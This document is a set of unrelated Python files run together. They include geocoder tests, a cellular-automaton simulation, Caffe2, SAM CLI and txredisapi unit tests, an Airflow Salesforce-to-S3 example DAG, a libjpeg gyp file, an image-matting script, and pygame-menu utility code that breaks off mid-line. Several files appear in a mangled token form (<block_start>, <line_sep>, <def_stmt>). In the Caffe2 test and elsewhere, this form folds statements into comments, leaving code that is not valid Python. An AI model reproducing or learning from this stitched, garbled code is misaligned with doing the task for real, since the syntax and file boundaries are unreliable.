theano.compile.debugmode.default_make_thunk.append(get_unbound_function(BaseActs.make_thunk))<class_stmt>UnimplementedError(Exception)<block_start>""" Like NotImplementedError, but designed not to be caught and suppressed by theano. """<block_end>
# coding: utf8
import geocoder

location = 'Ottawa'
coordinates = {'lat': 41.005407, 'lng': 28.978349}


def test_yandex():
    """Forward geocoding of a place name via Yandex should succeed."""
    result = geocoder.yandex(location)
    assert result.ok


def test_yandex_reverse():
    """Reverse geocoding of a lat/lng pair via Yandex should succeed."""
    result = geocoder.yandex(coordinates, method='reverse')
    assert result.ok


def test_multi_results():
    """Requesting up to 3 rows should return exactly 3 results."""
    result = geocoder.yandex(location, maxRows=3)
    assert len(result) == 3
import pycxsimulator
from pylab import *

# Grid dimensions and model parameters.
width = 50
height = 50
initProb = 0.01       # probability a cell starts in state 2
infectionRate = 0.85  # probability a state-1 cell becomes 2 per state-2 neighbor
regrowthRate = 0.15   # probability a state-0 cell becomes 1 per state-1 neighbor


def initialize():
    """Seed the grid: each cell starts in state 2 with probability initProb,
    otherwise state 1 (states: 0 = empty, 1 = healthy, 2 = infected --
    presumed semantics, confirm against the accompanying material)."""
    global time, config, nextConfig
    time = 0
    config = zeros([height, width])
    for x in range(width):
        for y in range(height):
            if random() < initProb:
                state = 2
            else:
                state = 1
            config[y, x] = state
    # Scratch grid written during update() and then swapped with config.
    nextConfig = zeros([height, width])


def observe():
    """Render the current grid as an image titled with the step count."""
    cla()
    imshow(config, vmin=0, vmax=2, cmap=cm.jet)
    axis('image')
    title('t = ' + str(time))


def update():
    """Advance the cellular automaton one synchronous step.

    Transition rules (per cell, scanning the 3x3 Moore neighborhood with
    toroidal wrap-around via the modulo indexing; note the neighborhood
    includes the cell itself, since dx = dy = 0 is not skipped):
    - state 0: each state-1 neighbor gives a regrowthRate chance to become 1
    - state 1: each state-2 neighbor gives an infectionRate chance to become 2
    - state 2: always becomes 0
    Each qualifying neighbor draws random() independently, so a cell with
    several qualifying neighbors has multiple chances to flip.
    """
    global time, config, nextConfig
    time += 1
    for x in range(width):
        for y in range(height):
            state = config[y, x]
            if state == 0:
                for dx in range(-1, 2):
                    for dy in range(-1, 2):
                        if config[(y + dy) % height, (x + dx) % width] == 1:
                            if random() < regrowthRate:
                                state = 1
            elif state == 1:
                for dx in range(-1, 2):
                    for dy in range(-1, 2):
                        if config[(y + dy) % height, (x + dx) % width] == 2:
                            if random() < infectionRate:
                                state = 2
            else:
                state = 0
            nextConfig[y, x] = state

    # Swap buffers so the new generation becomes current.
    config, nextConfig = nextConfig, config


pycxsimulator.GUI().start(func=[initialize, observe, update])
# Copyright (c) 2016-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_from_stmt>caffe2.python workspace<import_stmt>os<import_stmt>tempfile<import_stmt>unittest<class_stmt>TestDB(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>handle,self.file_name=tempfile.mkstemp()<line_sep>os.close(handle)<line_sep>self.data=[("key{}".format(i).encode("ascii") "value{}".format(i).encode("ascii"))<for>i range(1 10)]<block_end><def_stmt>testSimple self<block_start>db=workspace.C.create_db("minidb" self.file_name workspace.C.Mode.write)<for_stmt>key,value self.data<block_start>transaction=db.new_transaction()<line_sep>transaction.put(key value)<del_stmt>transaction<block_end><del_stmt>db# should close DB db=workspace.C.create_db("minidb" self.file_name workspace.C.Mode.read)<line_sep>cursor=db.new_cursor()<line_sep>data=[]<while_stmt>cursor.valid()<block_start>data.append((cursor.key() cursor.value()))<line_sep>cursor.next()# noqa: B305 <block_end><del_stmt>cursor<line_sep>db.close()# test explicit db closer self.assertEqual(data self.data)<block_end><block_end>
import pytest


@pytest.fixture
def spam():
    """Fixture that supplies the literal string ``"spam"``."""
    return "spam"
"""Unit tests for samcli.lib.cookiecutter.question."""
from typing import List, Union, Dict
from unittest import TestCase
from unittest.mock import ANY, patch, Mock

from parameterized import parameterized

from samcli.lib.cookiecutter.question import Question, QuestionKind, Choice, Confirm, Info, QuestionFactory


class TestQuestion(TestCase):
    _ANY_TEXT = "any text"
    _ANY_KEY = "any key"
    _ANY_OPTIONS = ["option1", "option2", "option3"]
    _ANY_ANSWER = "any answer"
    _ANY_NEXT_QUESTION_MAP = {
        "option1": "key1",
        "option2": "key2",
        "option3": "key3",
    }
    _ANY_DEFAULT_NEXT_QUESTION_KEY = "default"
    _ANY_KIND = QuestionKind.question

    def setUp(self):
        self.question = Question(
            text=self._ANY_TEXT,
            key=self._ANY_KEY,
            default=self._ANY_ANSWER,
            is_required=True,
            allow_autofill=False,
            next_question_map=self._ANY_NEXT_QUESTION_MAP,
            default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
        )

    def get_question_with_default_from_cookiecutter_context_using_keypath(
        self, key_path: List[Union[str, Dict]]
    ) -> Question:
        """Build a Question whose default answer is resolved from the
        cookiecutter context via the given key path."""
        return Question(
            text=self._ANY_TEXT,
            key=self._ANY_KEY,
            default={"keyPath": key_path},
            is_required=True,
            next_question_map=self._ANY_NEXT_QUESTION_MAP,
            default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
        )

    def test_creating_questions(self):
        q = Question(text=self._ANY_TEXT, key=self._ANY_KEY)
        self.assertEqual(q.text, self._ANY_TEXT)
        self.assertEqual(q.key, self._ANY_KEY)
        self.assertEqual(q.default_answer, "")
        self.assertFalse(q.required)
        self.assertEqual(q.next_question_map, {})
        self.assertIsNone(q.default_next_question_key)
        q = self.question
        self.assertEqual(q.text, self._ANY_TEXT)
        self.assertEqual(q.key, self._ANY_KEY)
        self.assertEqual(q.default_answer, self._ANY_ANSWER)
        self.assertTrue(q.required)
        self.assertEqual(q.next_question_map, self._ANY_NEXT_QUESTION_MAP)
        self.assertEqual(q.default_next_question_key, self._ANY_DEFAULT_NEXT_QUESTION_KEY)

    def test_question_key_and_text_are_required(self):
        with self.assertRaises(TypeError):
            Question(text=self._ANY_TEXT)
        with self.assertRaises(TypeError):
            Question(key=self._ANY_KEY)

    def test_get_next_question_key(self):
        self.assertEqual(self.question.get_next_question_key("option1"), "key1")
        self.assertEqual(self.question.get_next_question_key("option2"), "key2")
        self.assertEqual(self.question.get_next_question_key("option3"), "key3")
        # Unknown answers fall back to the default next-question key.
        self.assertEqual(self.question.get_next_question_key("any-option"), self._ANY_DEFAULT_NEXT_QUESTION_KEY)
        self.question.set_default_next_question_key("new_default")
        self.assertEqual(self.question.get_next_question_key(None), "new_default")

    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask(self, mock_click):
        mock_click.prompt.return_value = self._ANY_ANSWER
        answer = self.question.ask({})
        self.assertEqual(answer, self._ANY_ANSWER)
        mock_click.prompt.assert_called_once_with(text=self.question.text, default=self.question.default_answer)

    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask_resolves_from_cookiecutter_context(self, mock_click):
        # Setup
        expected_default_value = Mock()
        previous_question_key = "this is a question"
        previous_question_answer = "this is an answer"
        context = {
            "['x', 'this is an answer']": expected_default_value,
            previous_question_key: previous_question_answer,
        }
        question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
            ["x", {"valueOf": previous_question_key}]
        )
        # Trigger
        question.ask(context=context)
        # Verify
        mock_click.prompt.assert_called_once_with(text=self.question.text, default=expected_default_value)

    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask_resolves_from_cookiecutter_context_non_exist_key_path(self, mock_click):
        # Setup
        context = {}
        question = self.get_question_with_default_from_cookiecutter_context_using_keypath(["y"])
        # Trigger
        question.ask(context=context)
        # Verify
        mock_click.prompt.assert_called_once_with(text=self.question.text, default=None)

    def test_ask_resolves_from_cookiecutter_context_non_exist_question_key(self):
        # Setup
        expected_default_value = Mock()
        previous_question_key = "this is a question"
        previous_question_answer = "this is an answer"
        context = {
            "['x', 'this is an answer']": expected_default_value,
            previous_question_key: previous_question_answer,
        }
        question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
            ["x", {"valueOf": "non_exist_question_key"}]
        )
        # Trigger
        with self.assertRaises(KeyError):
            question.ask(context=context)

    @parameterized.expand([("this should have been a list"), ([1],), ({},)])
    def test_ask_resolves_from_cookiecutter_context_with_key_path_not_a_list(self, key_path):
        # Setup
        context = {}
        question = self.get_question_with_default_from_cookiecutter_context_using_keypath(key_path)
        # Trigger
        with self.assertRaises(ValueError):
            question.ask(context=context)

    @parameterized.expand([({"keyPath123": Mock()},), ({"keyPath": [{"valueOf123": Mock()}]},)])
    def test_ask_resolves_from_cookiecutter_context_with_default_object_missing_keys(self, default_object):
        # Setup
        context = {}
        question = self.get_question_with_default_from_cookiecutter_context_using_keypath([])
        question._default_answer = default_object
        # Trigger
        with self.assertRaises(KeyError):
            question.ask(context=context)

    def test_question_allow_autofill_with_default_value(self):
        q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True, default="123")
        # NOTE: was assertEquals, a deprecated alias removed in Python 3.12.
        self.assertEqual("123", q.ask())

    @patch("samcli.lib.cookiecutter.question.click")
    def test_question_allow_autofill_without_default_value(self, click_mock):
        answer_mock = click_mock.prompt.return_value = Mock()
        q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True)
        self.assertEqual(answer_mock, q.ask())


class TestChoice(TestCase):
    def setUp(self):
        self.question = Choice(
            text=TestQuestion._ANY_TEXT,
            key=TestQuestion._ANY_KEY,
            options=TestQuestion._ANY_OPTIONS,
            default=TestQuestion._ANY_ANSWER,
            is_required=True,
            next_question_map=TestQuestion._ANY_NEXT_QUESTION_MAP,
            default_next_question_key=TestQuestion._ANY_DEFAULT_NEXT_QUESTION_KEY,
        )

    def test_create_choice_question(self):
        self.assertEqual(self.question.text, TestQuestion._ANY_TEXT)
        self.assertEqual(self.question.key, TestQuestion._ANY_KEY)
        self.assertEqual(self.question._options, TestQuestion._ANY_OPTIONS)
        with self.assertRaises(TypeError):
            Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT)
        with self.assertRaises(ValueError):
            Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=None)
        with self.assertRaises(ValueError):
            Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=[])

    def test_get_options_indexes_with_different_bases(self):
        indexes = self.question._get_options_indexes()
        self.assertEqual(indexes, [0, 1, 2])
        indexes = self.question._get_options_indexes(base=1)
        self.assertEqual(indexes, [1, 2, 3])

    @patch("samcli.lib.cookiecutter.question.click.Choice")
    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask(self, mock_click, mock_choice):
        mock_click.prompt.return_value = 2
        answer = self.question.ask({})
        self.assertEqual(answer, TestQuestion._ANY_OPTIONS[1])  # we deduct one from user's choice (base 1 vs base 0)
        mock_click.prompt.assert_called_once_with(
            text="Choice",
            default=self.question.default_answer,
            show_choices=False,
            type=ANY,
            show_default=self.question.default_answer is not None,
        )
        mock_choice.assert_called_once_with(["1", "2", "3"])


class TestInfo(TestCase):
    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask(self, mock_click):
        q = Info(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
        mock_click.echo.return_value = None
        answer = q.ask({})
        self.assertIsNone(answer)
        mock_click.echo.assert_called_once_with(message=q.text)


class TestConfirm(TestCase):
    @patch("samcli.lib.cookiecutter.question.click")
    def test_ask(self, mock_click):
        q = Confirm(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
        mock_click.confirm.return_value = True
        answer = q.ask({})
        self.assertTrue(answer)
        mock_click.confirm.assert_called_once_with(text=q.text)


class TestQuestionFactory(TestCase):
    def test_there_is_a_handler_for_each_question_kind(self):
        question_json = {"key": TestQuestion._ANY_KEY, "question": TestQuestion._ANY_TEXT, "options": ["a", "b"]}
        for kind in QuestionKind:
            question_json["kind"] = kind.name
            q = QuestionFactory.create_question_from_json(question_json)
            expected_type = QuestionFactory.question_classes[kind]
            self.assertIsInstance(q, expected_type)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is a basic example DAG for using `SalesforceToS3Operator` to retrieve Salesforce
customer data and upload to an S3 bucket.
"""
from datetime import datetime

from airflow import DAG
from airflow.providers.amazon.aws.operators.s3_copy_object import S3CopyObjectOperator
from airflow.providers.amazon.aws.operators.s3_delete_objects import S3DeleteObjectsOperator
from airflow.providers.amazon.aws.transfers.salesforce_to_s3 import SalesforceToS3Operator

BASE_PATH = "salesforce/customers"
FILE_NAME = "customer_daily_extract_{{ ds_nodash }}.csv"

with DAG(
    dag_id="example_salesforce_to_s3_transfer",
    schedule_interval="@daily",
    start_date=datetime(2021, 7, 8),
    catchup=False,
    default_args={"retries": 1, "aws_conn_id": "s3"},
    tags=["example"],
    default_view="graph",
) as dag:
    # Step 1: pull the Salesforce query results into the landing bucket.
    # [START howto_operator_salesforce_to_s3_transfer]
    upload_salesforce_data_to_s3_landing = SalesforceToS3Operator(
        task_id="upload_salesforce_data_to_s3",
        salesforce_query="SELECT Id, Name, Company, Phone, Email, LastModifiedDate, IsActive FROM Customers",
        s3_bucket_name="landing-bucket",
        s3_key=f"{BASE_PATH}/{FILE_NAME}",
        salesforce_conn_id="salesforce",
        replace=True,
    )
    # [END howto_operator_salesforce_to_s3_transfer]

    date_prefixes = "{{ execution_date.strftime('%Y/%m/%d') }}"

    # Step 2: copy the extract into the date-partitioned data lake location.
    store_to_s3_data_lake = S3CopyObjectOperator(
        task_id="store_to_s3_data_lake",
        source_bucket_key=upload_salesforce_data_to_s3_landing.output,
        dest_bucket_name="data_lake",
        dest_bucket_key=f"{BASE_PATH}/{date_prefixes}/{FILE_NAME}",
    )

    # Step 3: clean up the landing copy once it has been stored.
    delete_data_from_s3_landing = S3DeleteObjectsOperator(
        task_id="delete_data_from_s3_landing",
        bucket=upload_salesforce_data_to_s3_landing.s3_bucket_name,
        keys=upload_salesforce_data_to_s3_landing.s3_key,
    )

    store_to_s3_data_lake >> delete_data_from_s3_landing

    # Task dependencies created via `XComArgs`:
    # upload_salesforce_data_to_s3_landing >> store_to_s3_data_lake
{'includes':['../common.gyp'] 'targets':[{'target_name':'libjpeg' 'type':'static_library' 'include_dirs':['.' ] 'sources':['ckconfig.c' 'jcapimin.c' 'jcapistd.c' 'jccoefct.c' 'jccolor.c' 'jcdctmgr.c' 'jchuff.c' 'jcinit.c' 'jcmainct.c' 'jcmarker.c' 'jcmaster.c' 'jcomapi.c' 'jcparam.c' 'jcphuff.c' 'jcprepct.c' 'jcsample.c' 'jctrans.c' 'jdapimin.c' 'jdapistd.c' 'jdatadst.c' 'jdatasrc.c' 'jdcoefct.c' 'jdcolor.c' 'jddctmgr.c' 'jdhuff.c' 'jdinput.c' 'jdmainct.c' 'jdmarker.c' 'jdmaster.c' 'jdmerge.c' 'jdphuff.c' 'jdpostct.c' 'jdsample.c' 'jdtrans.c' 'jerror.c' 'jfdctflt.c' 'jfdctfst.c' 'jfdctint.c' 'jidctflt.c' 'jidctfst.c' 'jidctint.c' 'jidctred.c' 'jmemansi.c' #'jmemdos.c', #'jmemmac.c', 'jmemmgr.c' #'jmemname.c', #'jmemnobs.c', 'jquant1.c' 'jquant2.c' 'jutils.c' ] } ]}<line_sep>
import argparse

import cv2
import numpy as np
import torch.nn.functional as F
from torchvision.transforms.functional import normalize

from facexlib.matting import init_matting_model
from facexlib.utils import img2tensor


def main(args):
    """Run the matting model on one image, saving the alpha matte and the
    white-background foreground composite next to ``args.save_path``."""
    modnet = init_matting_model()

    # read image, scaled to [0, 1]
    img = cv2.imread(args.img_path) / 255.

    # unify image channels to 3
    if len(img.shape) == 2:
        img = img[:, :, None]
    if img.shape[2] == 1:
        img = np.repeat(img, 3, axis=2)
    elif img.shape[2] == 4:
        img = img[:, :, 0:3]

    # convert to a normalized 4D CUDA tensor
    img_t = img2tensor(img, bgr2rgb=True, float32=True)
    normalize(img_t, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5), inplace=True)
    img_t = img_t.unsqueeze(0).cuda()

    # Resize for inference: when the image does not already straddle
    # ref_size, scale it so the short side equals ref_size; then snap both
    # sides down to multiples of 32.
    _, _, src_h, src_w = img_t.shape
    ref_size = 512
    if max(src_h, src_w) < ref_size or min(src_h, src_w) > ref_size:
        if src_w >= src_h:
            new_h = ref_size
            new_w = int(src_w / src_h * ref_size)
        elif src_w < src_h:
            new_w = ref_size
            new_h = int(src_h / src_w * ref_size)
    else:
        new_h = src_h
        new_w = src_w
    new_w = new_w - new_w % 32
    new_h = new_h - new_h % 32
    img_t = F.interpolate(img_t, size=(new_h, new_w), mode='area')

    # inference; the model's third output is used as the matte
    _, _, matte = modnet(img_t, True)

    # upsample the matte back to the source resolution and save it
    matte = F.interpolate(matte, size=(src_h, src_w), mode='area')
    matte = matte[0][0].data.cpu().numpy()
    cv2.imwrite(args.save_path, (matte * 255).astype('uint8'))

    # composite the foreground over a white background and save it too
    matte = matte[:, :, None]
    foreground = img * matte + np.full(img.shape, 1) * (1 - matte)
    cv2.imwrite(args.save_path.replace('.png', '_fg.png'), foreground * 255)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--img_path', type=str, default='assets/test.jpg')
    parser.add_argument('--save_path', type=str, default='test_matting.png')
    main(parser.parse_args())
# coding: utf-8
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import six
import txredisapi as redis

from twisted.trial import unittest
from twisted.internet.protocol import ClientFactory
from twisted.test.proto_helpers import StringTransportWithDisconnection
from twisted.internet import task


class MockFactory(ClientFactory):
    pass


class LineReceiverSubclass(redis.LineReceiver):
    """Records the last line / raw chunk received, for assertions."""

    def lineReceived(self, line):
        self._rcvd_line = line

    def rawDataReceived(self, data):
        self._rcvd_data = data


class TestLineReciever(unittest.TestCase):  # NOTE: name typo kept (test discovery)
    S = six.b('TEST')

    def setUp(self):
        self.proto = LineReceiverSubclass()
        self.transport = StringTransportWithDisconnection()
        self.proto.makeConnection(self.transport)
        self.transport.protocol = self.proto
        self.proto.factory = MockFactory()

    def test_excess_line_length(self):
        # An undelimited flood longer than MAX_LENGTH must drop the connection.
        self.assertTrue(self.transport.connected)
        self.proto.dataReceived(six.b('\x00') * (self.proto.MAX_LENGTH + 1))
        self.assertFalse(self.transport.connected)

    def test_excess_delimited_line(self):
        self.assertTrue(self.transport.connected)
        self.proto.dataReceived(self.S + self.proto.delimiter)
        self.assertEqual(self.proto._rcvd_line, self.S.decode())
        # An over-long delimited line must disconnect without delivering it.
        payload = (six.b('\x00') * (self.proto.MAX_LENGTH + 1)) + self.proto.delimiter
        self.proto._rcvd_line = None
        self.proto.dataReceived(payload)
        self.assertFalse(self.transport.connected)
        self.assertIs(self.proto._rcvd_line, None)

    def test_clear_line_buffer(self):
        self.proto.dataReceived(self.S)
        self.assertEqual(self.proto.clearLineBuffer(), self.S)

    def test_send_line(self):
        self.proto.dataReceived(self.S + self.proto.delimiter)
        self.assertEqual(self.proto._rcvd_line, self.S.decode())

    def test_raw_data(self):
        clock = task.Clock()
        self.proto.callLater = clock.callLater
        self.proto.setRawMode()
        payload = self.S + self.proto.delimiter
        self.proto.dataReceived(payload)
        self.assertEqual(self.proto._rcvd_data, payload)
        # Switching back to line mode re-parses the handed-back bytes.
        self.proto._rcvd_line = None
        self.proto.setLineMode(payload)
        clock.advance(1)
        self.assertEqual(self.proto._rcvd_line, self.S.decode())
        self.proto.dataReceived(payload)
        self.assertEqual(self.proto._rcvd_line, self.S.decode())

    def test_sendline(self):
        self.proto.sendLine(self.S)
        sent = self.transport.value()
        self.assertEqual(sent, self.S + self.proto.delimiter)


class TestBaseRedisProtocol(unittest.TestCase):
    def setUp(self):
        self._protocol = redis.BaseRedisProtocol()

    def test_build_ping(self):
        # PING must serialize to the RESP multi-bulk wire format.
        ping = self._protocol._build_command("PING")
        self.assertEqual(ping, six.b('*1\r\n$4\r\nPING\r\n'))
""" pygame-menu https://github.com/ppizarror/pygame-menu UTILS Utility functions. License: ------------------------------------------------------------------------------- The MIT License (MIT) Copyright 2017-2021 <NAME>. @ppizarror Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
------------------------------------------------------------------------------- """<line_sep>__all__=[# Methods 'assert_alignment' 'assert_color' 'assert_cursor' 'assert_list_vector' 'assert_orientation' 'assert_position' 'assert_position_vector' 'assert_vector' 'check_key_pressed_valid' 'fill_gradient' 'format_color' 'get_cursor' 'get_finger_pos' 'is_callable' 'load_pygame_image_file' 'make_surface' 'mouse_motion_current_mouse_position' 'parse_padding' 'print_menu_widget_structure' 'set_pygame_cursor' 'uuid4' 'warn' 'widget_terminal_title' # Constants 'PYGAME_V2' # Classes 'TerminalColors']<import_stmt>functools<line_sep># import inspect <import_stmt>sys<import_stmt>traceback<import_stmt>types<import_stmt>uuid<import_stmt>warnings<import_stmt>pygame<import_stmt>pygame_menu<import_from_stmt>pygame_menu.locals ALIGN_CENTER ALIGN_LEFT ALIGN_RIGHT POSITION_CENTER POSITION_NORTH POSITION_SOUTH POSITION_SOUTHEAST POSITION_NORTHWEST POSITION_WEST POSITION_EAST POSITION_NORTHEAST POSITION_SOUTHWEST ORIENTATION_HORIZONTAL ORIENTATION_VERTICAL FINGERDOWN FINGERUP FINGERMOTION<import_from_stmt>pygame_menu._types ColorType ColorInputType Union List Vector2NumberType NumberType Any Optional Tuple NumberInstance VectorInstance PaddingInstance PaddingType Tuple4IntType ColorInputInstance VectorType EventType CursorInputInstance CursorInputType Tuple2IntType Dict<line_sep>PYGAME_V2=pygame.version.vernum[0]<ge>2<line_sep>WARNINGS_LAST_MESSAGES:Dict[int bool]={}<def_stmt>assert_alignment align:str<arrow><none><block_start>""" Assert that a certain alignment is valid. :param align: Align value :return: None """<assert_stmt>isinstance(align str) f'alignment "{align}" must be a string'<assert_stmt>align<in>(ALIGN_LEFT ALIGN_CENTER ALIGN_RIGHT) f'incorrect alignment value "{align}"'<block_end><def_stmt>assert_color color:Union[ColorInputType List[int]] warn_if_invalid:bool=<true><arrow>ColorType<block_start>""" Assert that a certain color is valid. 
:param color: Object color :param warn_if_invalid: If ``True`` warns if the color is invalid :return: Formatted color if valid, else, throws an ``AssertionError`` exception """<line_sep>color=format_color(color warn_if_invalid=warn_if_invalid)<assert_stmt>isinstance(color VectorInstance) f'color must be a tuple or list, not type "{type(color)}"'<assert_stmt>4<ge>len(color)<ge>3 'color must be a tuple or list of 3 or 4 numbers'<for_stmt>i range(3)<block_start><assert_stmt>isinstance(color[i] int) f'"{color[i]}" in element color {color} must be an integer, not type "{type(color)}"'<assert_stmt>0<le>color[i]<le>255 f'"{color[i]}" in element color {color} must be an integer between 0 and 255'<block_end><if_stmt>len(color)<eq>4<block_start><assert_stmt>isinstance(color[3] int) f'alpha channel must be an integer between 0 and 255, not type "{type(color)}"'<assert_stmt>0<le>color[3]<le>255 f'opacity of color {color} must be an integer between 0 and 255; '<concat>f'where 0 is fully-transparent and 255 is fully-opaque'<block_end><return>color<block_end><def_stmt>assert_cursor cursor:CursorInputType<arrow><none><block_start>""" Assert a given cursor is valid. :param cursor: Cursor object :return: None """<assert_stmt>isinstance(cursor CursorInputInstance) 'cursor instance invalid, it can be None, an integer, '<concat>'or pygame.cursors.Cursor'<block_end><def_stmt>assert_list_vector list_vector:Union[List[Vector2NumberType] Tuple[Vector2NumberType <ellipsis>]] length:int<arrow><none><block_start>""" Assert that a list fixed length vector is numeric. :param list_vector: Numeric list vector :param length: Length of the required vector. 
If ``0`` don't check the length :return: None """<assert_stmt>isinstance(list_vector VectorInstance) f'list_vector "{list_vector}" must be a tuple or list'<for_stmt>v list_vector<block_start>assert_vector(v length)<block_end><block_end><def_stmt>assert_orientation orientation:str<arrow><none><block_start>""" Assert that a certain widget orientation is valid. :param orientation: Object orientation :return: None """<assert_stmt>isinstance(orientation str) f'orientation "{orientation}" must be a string'<assert_stmt>orientation<in>(ORIENTATION_HORIZONTAL ORIENTATION_VERTICAL) f'invalid orientation value "{orientation}"'<block_end><def_stmt>assert_position position:str<arrow><none><block_start>""" Assert that a certain position is valid. :param position: Object position :return: None """<assert_stmt>isinstance(position str) f'position "{position}" must be a string'<assert_stmt>position<in>(POSITION_WEST POSITION_SOUTHWEST POSITION_SOUTH POSITION_SOUTHEAST POSITION_EAST POSITION_NORTH POSITION_NORTHWEST POSITION_NORTHEAST POSITION_CENTER) f'invalid position value "{position}"'<block_end><def_stmt>assert_position_vector position:Union[str List[str] Tuple[str <ellipsis>]]<arrow><none><block_start>""" Assert that a position vector is valid. :param position: Object position :return: None """<if_stmt>isinstance(position str)<block_start>assert_position(position)<block_end><else_stmt><block_start><assert_stmt>isinstance(position VectorInstance)<line_sep>unique=[]<for_stmt>pos position<block_start>assert_position(pos)<if_stmt>pos<not><in>unique<block_start>unique.append(pos)<block_end><block_end><assert_stmt>len(unique)<eq>len(position) 'there cannot be repeated positions'<block_end><block_end><def_stmt>assert_vector num_vector:VectorType length:int instance:type=NumberInstance<arrow><none><block_start>""" Assert that a fixed length vector is numeric. :param num_vector: Numeric vector :param length: Length of the required vector. 
If ``0`` don't check the length :param instance: Instance of each item of the vector :return: None """<assert_stmt>isinstance(num_vector VectorInstance) f'vector "{num_vector}" must be a list or tuple of {length} items if type {instance}'<if_stmt>length<ne>0<block_start><assert_stmt>len(num_vector)<eq>length f'vector "{num_vector}" must contain {length} numbers only, '<concat>f'but {num_vector} were given'<block_end><for_stmt>i range(len(num_vector))<block_start>num=num_vector[i]<if_stmt>instance<eq>int<and>isinstance(num float)<and>int(num)<eq>num<block_start>num=int(num)<block_end><assert_stmt>isinstance(num instance) f'item {num} of vector must be {instance}, not type "{type(num)}"'<block_end><block_end><def_stmt>check_key_pressed_valid event:EventType<arrow>bool<block_start>""" Checks if the pressed key is valid. :param event: Key press event :return: ``True`` if a key is pressed """<line_sep># If the system detects that any key event has been pressed but # there's not any key pressed then this method raises a KEYUP # flag bad_event=<not>(<true><in>pygame.key.get_pressed())<if_stmt>bad_event<block_start><if_stmt>'test'<in>event.dict<and>event.dict['test']<block_start><return><true><block_end>ev=pygame.event.Event(pygame.KEYUP {'key':event.key})<line_sep>pygame.event.post(ev)<block_end><return><not>bad_event<block_end><def_stmt>fill_gradient surface:'pygame.Surface' color:ColorInputType gradient:ColorInputType rect:Optional['pygame.Rect']=<none> vertical:bool=<true> forward:bool=<true><arrow><none><block_start>""" Fill a surface with a gradient pattern. 
:param surface: Surface to fill :param color: Starting color :param gradient: Final color :param rect: Area to fill; default is surface's rect :param vertical: True=vertical; False=horizontal :param forward: True=forward; False=reverse :return: None """<if_stmt>rect<is><none><block_start>rect=surface.get_rect()<block_end>x1,x2=rect.left rect.right<line_sep>y1,y2=rect.top rect.bottom<line_sep>color=assert_color(color)<line_sep>gradient=assert_color(gradient)<if_stmt>vertical<block_start>h=y2-y1<block_end><else_stmt><block_start>h=x2-x1<block_end><if_stmt>forward<block_start>a,b=color gradient<block_end><else_stmt><block_start>b,a=color gradient<block_end>rate=(float(b[0]-a[0])/h float(b[1]-a[1])/h float(b[2]-a[2])/h)<line_sep>fn_line=pygame.draw.line<if_stmt>vertical<block_start><for_stmt>line range(y1 y2)<block_start>color=(min(max(a[0]+(rate[0]<times>(line-y1)) 0) 255) min(max(a[1]+(rate[1]<times>(line-y1)) 0) 255) min(max(a[2]+(rate[2]<times>(line-y1)) 0) 255))<line_sep>fn_line(surface color (x1 line) (x2 line))<block_end><block_end><else_stmt><block_start><for_stmt>col range(x1 x2)<block_start>color=(min(max(a[0]+(rate[0]<times>(col-x1)) 0) 255) min(max(a[1]+(rate[1]<times>(col-x1)) 0) 